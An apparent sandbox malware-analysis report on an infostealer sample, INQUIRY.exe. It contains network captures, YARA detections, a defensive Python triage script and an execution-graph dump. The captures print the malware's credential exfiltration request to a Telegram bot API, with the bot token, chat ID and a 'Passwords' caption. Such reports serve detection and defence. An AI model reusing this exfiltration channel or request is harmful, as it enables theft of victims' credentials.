0 | 192.168.2.4 | 49733 | 172.67.177.134 | 443 | 7348 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 01:45:17 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-26 01:45:17 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 01:45:17 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 492306
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJVisECA4ytE2KX%2FELbrKjuSP3j5juoCiSjO0dstH%2FGaTDXlsI4Qq9V0sagUO4QI2of5dRoBb47je0RK2ETjkdw6pjhq0Ae5tkkvWPAmu%2BoCgYbbzqz%2BI58jwtfkFOLtAOsZB1YH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f7d63fe6a4a72bc-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1831&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1578378&cwnd=252&unsent_bytes=0&cid=745f07eaaa2d0605&ts=452&x=0"
2024-12-26 01:45:17 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 149.154.167.220 | 443 | 7348 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 01:45:26 UTC | 295 | OUT | POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7
Host: api.telegram.org
Content-Length: 1090
Connection: Keep-Alive
2024-12-26 01:45:26 UTC | 1090 | OUT | Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 35 32 35 30 65 39 62 36 63 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: --===============8dd25250e9b6ca7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-26 01:45:27 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Thu, 26 Dec 2024 01:45:26 GMT
Content-Type: application/json
Content-Length: 556
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-26 01:45:27 UTC | 556 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 37 34 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 31 37 37 35 32 36 2c 22 64 6f 63 75
                                                                                            Data Ascii: {"ok":true,"result":{"message_id":27489,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1735177526,"docu



                                                                                            Target ID:0
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xa10000
                                                                                            File size:1'091'584 bytes
                                                                                            MD5 hash:BA7B76B0763B1488A2AEE0892BDBBF12
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xa10000
                                                                                            File size:1'091'584 bytes
                                                                                            MD5 hash:BA7B76B0763B1488A2AEE0892BDBBF12
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:20:45:00
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xb70000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false
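Two things in the process listing above are worth checking mechanically rather than by eye: for Target IDs 1 and 3 the Path is the Microsoft .NET RegSvcs.exe while the Commandline still names INQUIRY.exe, and the RedLine rule for Target ID 3 fires on a dump of the region at 0x400000 whose fifth dotted field is 0x40. The following is an added example, not Joe Sandbox code, that parses an excerpt of the listing (embedded below, copied from the report) and flags both conditions. It assumes the .sdmp name is laid out as <target>.<n>.<dump id>.<base address>.<protection>.<...> and that the protection field carries the Win32 page-protection value (0x04 PAGE_READWRITE, 0x40 PAGE_EXECUTE_READWRITE); that reading of the file name is this example's assumption, not something the report states.

```python
import re
from pathlib import PureWindowsPath

# Excerpt of the process listing above, embedded as the sample input for this
# example.  An analyst would paste the whole listing in its place.
PROCESS_LISTING = r"""
Target ID:0
Path:C:\Users\user\Desktop\INQUIRY.exe
Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen

Target ID:3
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
"""

# Win32 page-protection constants.  Treating the 5th dotted field of a
# .sdmp name as this value is an assumption of this example.
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

RULE_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+?\.sdmp)")


def parse_processes(listing: str) -> list[dict]:
    """Split the listing into one dict per process; Yara hits go in 'yara'."""
    procs = []
    for block in re.split(r"\n\s*\n", listing.strip()):
        proc = {"yara": []}
        for line in block.splitlines():
            line = line.strip()
            if line.startswith("•"):
                m = RULE_RE.search(line)
                if m:
                    proc["yara"].append((m["rule"].strip(), m["src"]))
            elif ":" in line:
                key, _, value = line.partition(":")
                proc[key.strip()] = value.strip()
        procs.append(proc)
    return procs


def image_from_commandline(cmd: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split()[0] if cmd else ""


def parse_sdmp_name(src: str) -> dict:
    """Decode <target>.<n>.<dump id>.<base>.<protect>.<...>.sdmp (assumed layout)."""
    parts = src[: -len(".sdmp")].split(".")
    return {"target": int(parts[0], 16),
            "base": int(parts[3], 16),
            "protect": int(parts[4], 16)}


def triage(proc: dict) -> dict:
    """Flag a command line naming a different image, and rule hits in RWX memory."""
    image = PureWindowsPath(proc.get("Path", "")).name
    claimed = PureWindowsPath(image_from_commandline(proc.get("Commandline", ""))).name
    mismatch = image.lower() != claimed.lower()
    rules_in_rwx = []
    for rule, src in proc["yara"]:
        info = parse_sdmp_name(src)
        if info["protect"] == PAGE_EXECUTE_READWRITE:
            rules_in_rwx.append((rule, hex(info["base"])))
    return {
        "target": proc.get("Target ID"),
        "image": image,
        "claimed_image": claimed,
        "commandline_mismatch": mismatch,
        "rules_in_rwx": rules_in_rwx,
        # A signed host whose command line still names the dropper, with a
        # malware signature in RWX memory, is the usual look of hollowing.
        "hollowing_suspect": mismatch and bool(rules_in_rwx),
    }


if __name__ == "__main__":
    for proc in parse_processes(PROCESS_LISTING):
        print(triage(proc))
```

Run against the excerpt, Target ID 0 comes back clean on both checks (the RedLine hit there is in a 0x04 private region) while Target ID 3 is flagged on both: RegSvcs.exe loaded, INQUIRY.exe claimed, and the RedLine rule matching at 0x400000 in RWX memory. Target ID 1 would show the command-line mismatch alone, since the report lists no Yara hits for it.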


                                                                                              Execution Graph

                                                                                              Execution Coverage:3.7%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:5.9%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:160
[Execution graph: the interactive node/edge listing is omitted here. API calls recoverable from the graph: a tray-icon window loop (RegisterWindowMessageW, SetTimer/KillTimer, CreatePopupMenu, Shell_NotifyIconW, DefWindowProcW, DestroyWindow, PostQuitMessage); an IsDebuggerPresent check at start-up with a MessageBoxA branch; working-directory handling (GetCurrentDirectoryW, GetFullPathNameW, SetCurrentDirectoryW); a registry read (RegOpenKeyExW, RegQueryValueExW, RegCloseKey); IsThemeActive and SystemParametersInfoW; GetOpenFileNameW; and CRT start-up (GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW, HeapAlloc/RtlAllocateHeap, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, TerminateProcess). Node addresses (0xa1xxxx to 0xa7xxxx) fall inside the INQUIRY.exe image loaded at 0xa10000.]
59 API calls 104275->104278 104275->104282 104283 a179f2 59 API calls 104275->104283 104395 a13f74 104275->104395 104277 a17de1 59 API calls 104276->104277 104276->104282 104279 a13e98 104277->104279 104278->104275 104280 a13f74 59 API calls 104279->104280 104280->104282 104282->104062 104283->104275 104401 a14bb5 104284->104401 104289 a4d8e6 104292 a14e4a 84 API calls 104289->104292 104290 a14e08 LoadLibraryExW 104411 a14b6a 104290->104411 104294 a4d8ed 104292->104294 104296 a14b6a 3 API calls 104294->104296 104298 a4d8f5 104296->104298 104297 a14e2f 104297->104298 104299 a14e3b 104297->104299 104437 a14f0b 104298->104437 104300 a14e4a 84 API calls 104299->104300 104302 a137d4 104300->104302 104302->104069 104302->104070 104305 a4d91c 104445 a14ec7 104305->104445 104307 a4d929 104309 a30db6 Mailbox 59 API calls 104308->104309 104310 a137fb 104309->104310 104310->104083 104312 a184cb 104311->104312 104314 a184f2 104312->104314 104875 a189b3 69 API calls Mailbox 104312->104875 104314->104087 104316 a13ef3 104315->104316 104317 a13eda 104315->104317 104319 a17bcc 59 API calls 104316->104319 104318 a18047 59 API calls 104317->104318 104320 a13879 104318->104320 104319->104320 104321 a32efd 104320->104321 104322 a32f09 104321->104322 104323 a32f7e 104321->104323 104330 a32f2e 104322->104330 104876 a38b28 58 API calls __getptd_noexit 104322->104876 104878 a32f90 60 API calls 4 library calls 104323->104878 104326 a32f8b 104326->104108 104327 a32f15 104877 a38db6 9 API calls __wctomb_s_l 104327->104877 104329 a32f20 104329->104108 104330->104108 104332 a192d6 104331->104332 104333 a30db6 Mailbox 59 API calls 104332->104333 104334 a192e4 104333->104334 104335 a13924 104334->104335 104879 a191fc 59 API calls Mailbox 104334->104879 104337 a19050 104335->104337 104880 a19160 104337->104880 104339 a30db6 Mailbox 59 API calls 104340 a13932 104339->104340 104342 a18ee0 104340->104342 104341 a1905f 104341->104339 104341->104340 104343 a4f17c 104342->104343 104345 a18ef7 
104342->104345 104343->104345 104890 a18bdb 59 API calls Mailbox 104343->104890 104346 a19040 104345->104346 104347 a18ff8 104345->104347 104350 a18fff 104345->104350 104889 a19d3c 60 API calls Mailbox 104346->104889 104348 a30db6 Mailbox 59 API calls 104347->104348 104348->104350 104350->104136 104352 a14ee5 85 API calls 104351->104352 104353 a795ca 104352->104353 104891 a79734 104353->104891 104356 a14f0b 74 API calls 104357 a795f7 104356->104357 104358 a14f0b 74 API calls 104357->104358 104359 a79607 104358->104359 104360 a14f0b 74 API calls 104359->104360 104361 a79622 104360->104361 104362 a14f0b 74 API calls 104361->104362 104363 a7963d 104362->104363 104364 a14ee5 85 API calls 104363->104364 104365 a79654 104364->104365 104366 a3571c __crtGetStringTypeA_stat 58 API calls 104365->104366 104367 a7965b 104366->104367 104368 a3571c __crtGetStringTypeA_stat 58 API calls 104367->104368 104369 a79665 104368->104369 104370 a14f0b 74 API calls 104369->104370 104371 a79679 104370->104371 104372 a79109 GetSystemTimeAsFileTime 104371->104372 104373 a7968c 104372->104373 104374 a796b6 104373->104374 104375 a796a1 104373->104375 104377 a796bc 104374->104377 104378 a7971b 104374->104378 104376 a32d55 _free 58 API calls 104375->104376 104379 a796a7 104376->104379 104897 a78b06 104377->104897 104381 a32d55 _free 58 API calls 104378->104381 104382 a32d55 _free 58 API calls 104379->104382 104384 a4d186 104381->104384 104382->104384 104384->104074 104386 a14e4a 104384->104386 104385 a32d55 _free 58 API calls 104385->104384 104387 a14e54 104386->104387 104388 a14e5b 104386->104388 104389 a353a6 __fcloseall 83 API calls 104387->104389 104390 a14e7b FreeLibrary 104388->104390 104391 a14e6a 104388->104391 104389->104388 104390->104391 104391->104074 104393 a17e4f 59 API calls 104392->104393 104394 a179fd 104393->104394 104394->104274 104396 a13f82 104395->104396 104400 a13fa4 _memmove 104395->104400 104399 a30db6 Mailbox 59 API calls 104396->104399 104397 a30db6 Mailbox 59 API 
calls 104398 a13fb8 104397->104398 104398->104275 104399->104400 104400->104397 104450 a14c03 104401->104450 104404 a14bdc 104405 a14bf5 104404->104405 104406 a14bec FreeLibrary 104404->104406 104408 a3525b 104405->104408 104406->104405 104407 a14c03 2 API calls 104407->104404 104454 a35270 104408->104454 104410 a14dfc 104410->104289 104410->104290 104612 a14c36 104411->104612 104414 a14ba1 FreeLibrary 104415 a14baa 104414->104415 104418 a14c70 104415->104418 104416 a14c36 2 API calls 104417 a14b8f 104416->104417 104417->104414 104417->104415 104419 a30db6 Mailbox 59 API calls 104418->104419 104420 a14c85 104419->104420 104616 a1522e 104420->104616 104422 a14c91 _memmove 104423 a14ccc 104422->104423 104425 a14dc1 104422->104425 104426 a14d89 104422->104426 104424 a14ec7 69 API calls 104423->104424 104433 a14cd5 104424->104433 104630 a7991b 95 API calls 104425->104630 104619 a14e89 CreateStreamOnHGlobal 104426->104619 104429 a14f0b 74 API calls 104429->104433 104431 a14d69 104431->104297 104432 a4d8a7 104434 a14ee5 85 API calls 104432->104434 104433->104429 104433->104431 104433->104432 104625 a14ee5 104433->104625 104435 a4d8bb 104434->104435 104436 a14f0b 74 API calls 104435->104436 104436->104431 104438 a4d9cd 104437->104438 104439 a14f1d 104437->104439 104654 a355e2 104439->104654 104442 a79109 104852 a78f5f 104442->104852 104444 a7911f 104444->104305 104446 a14ed6 104445->104446 104449 a4d990 104445->104449 104857 a35c60 104446->104857 104448 a14ede 104448->104307 104451 a14bd0 104450->104451 104452 a14c0c LoadLibraryA 104450->104452 104451->104404 104451->104407 104452->104451 104453 a14c1d GetProcAddress 104452->104453 104453->104451 104457 a3527c __initptd 104454->104457 104455 a3528f 104503 a38b28 58 API calls __getptd_noexit 104455->104503 104457->104455 104458 a352c0 104457->104458 104473 a404e8 104458->104473 104459 a35294 104504 a38db6 9 API calls __wctomb_s_l 104459->104504 104462 a352c5 104463 a352db 104462->104463 104464 a352ce 104462->104464 104466 
a35305 104463->104466 104467 a352e5 104463->104467 104505 a38b28 58 API calls __getptd_noexit 104464->104505 104488 a40607 104466->104488 104506 a38b28 58 API calls __getptd_noexit 104467->104506 104470 a3529f __initptd @_EH4_CallFilterFunc@8 104470->104410 104474 a404f4 __initptd 104473->104474 104475 a39c0b __lock 58 API calls 104474->104475 104486 a40502 104475->104486 104476 a40576 104508 a405fe 104476->104508 104477 a4057d 104513 a3881d 58 API calls 2 library calls 104477->104513 104480 a40584 104480->104476 104514 a39e2b InitializeCriticalSectionAndSpinCount 104480->104514 104481 a405f3 __initptd 104481->104462 104483 a39c93 __mtinitlocknum 58 API calls 104483->104486 104485 a405aa EnterCriticalSection 104485->104476 104486->104476 104486->104477 104486->104483 104511 a36c50 59 API calls __lock 104486->104511 104512 a36cba LeaveCriticalSection LeaveCriticalSection _doexit 104486->104512 104496 a40627 __wopenfile 104488->104496 104489 a40641 104519 a38b28 58 API calls __getptd_noexit 104489->104519 104491 a40646 104520 a38db6 9 API calls __wctomb_s_l 104491->104520 104493 a4085f 104516 a485a1 104493->104516 104494 a35310 104507 a35332 LeaveCriticalSection LeaveCriticalSection _fseek 104494->104507 104496->104489 104502 a407fc 104496->104502 104521 a337cb 60 API calls 3 library calls 104496->104521 104498 a407f5 104498->104502 104522 a337cb 60 API calls 3 library calls 104498->104522 104500 a40814 104500->104502 104523 a337cb 60 API calls 3 library calls 104500->104523 104502->104489 104502->104493 104503->104459 104504->104470 104505->104470 104506->104470 104507->104470 104515 a39d75 LeaveCriticalSection 104508->104515 104510 a40605 104510->104481 104511->104486 104512->104486 104513->104480 104514->104485 104515->104510 104524 a47d85 104516->104524 104518 a485ba 104518->104494 104519->104491 104520->104494 104521->104498 104522->104500 104523->104502 104525 a47d91 __initptd 104524->104525 104526 a47da7 104525->104526 104529 a47ddd 104525->104529 104609 
a38b28 58 API calls __getptd_noexit 104526->104609 104528 a47dac 104610 a38db6 9 API calls __wctomb_s_l 104528->104610 104535 a47e4e 104529->104535 104532 a47df9 104611 a47e22 LeaveCriticalSection __unlock_fhandle 104532->104611 104534 a47db6 __initptd 104534->104518 104536 a47e6e 104535->104536 104537 a344ea __wsopen_nolock 58 API calls 104536->104537 104541 a47e8a 104537->104541 104538 a38dc6 __invoke_watson 8 API calls 104540 a485a0 104538->104540 104539 a47ee7 104549 a47fa5 104539->104549 104557 a47f83 104539->104557 104542 a47d85 __wsopen_helper 103 API calls 104540->104542 104541->104539 104543 a47ec4 104541->104543 104558 a47fc1 104541->104558 104544 a485ba 104542->104544 104545 a38af4 __wsopen_nolock 58 API calls 104543->104545 104544->104532 104546 a47ec9 104545->104546 104547 a38b28 __recalloc 58 API calls 104546->104547 104548 a47ed6 104547->104548 104550 a38db6 __wctomb_s_l 9 API calls 104548->104550 104551 a38af4 __wsopen_nolock 58 API calls 104549->104551 104552 a47ee0 104550->104552 104553 a47faa 104551->104553 104552->104532 104554 a38b28 __recalloc 58 API calls 104553->104554 104555 a47fb7 104554->104555 104556 a38db6 __wctomb_s_l 9 API calls 104555->104556 104556->104558 104559 a3d294 __alloc_osfhnd 61 API calls 104557->104559 104558->104538 104560 a48051 104559->104560 104561 a4807e 104560->104561 104562 a4805b 104560->104562 104564 a47cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 104561->104564 104563 a38af4 __wsopen_nolock 58 API calls 104562->104563 104565 a48060 104563->104565 104572 a480a0 104564->104572 104567 a38b28 __recalloc 58 API calls 104565->104567 104566 a4811e GetFileType 104570 a48129 GetLastError 104566->104570 104571 a4816b 104566->104571 104569 a4806a 104567->104569 104568 a480ec GetLastError 104573 a38b07 __dosmaperr 58 API calls 104568->104573 104574 a38b28 __recalloc 58 API calls 104569->104574 104575 a38b07 __dosmaperr 58 API calls 104570->104575 104580 a3d52a __set_osfhnd 59 API calls 104571->104580 
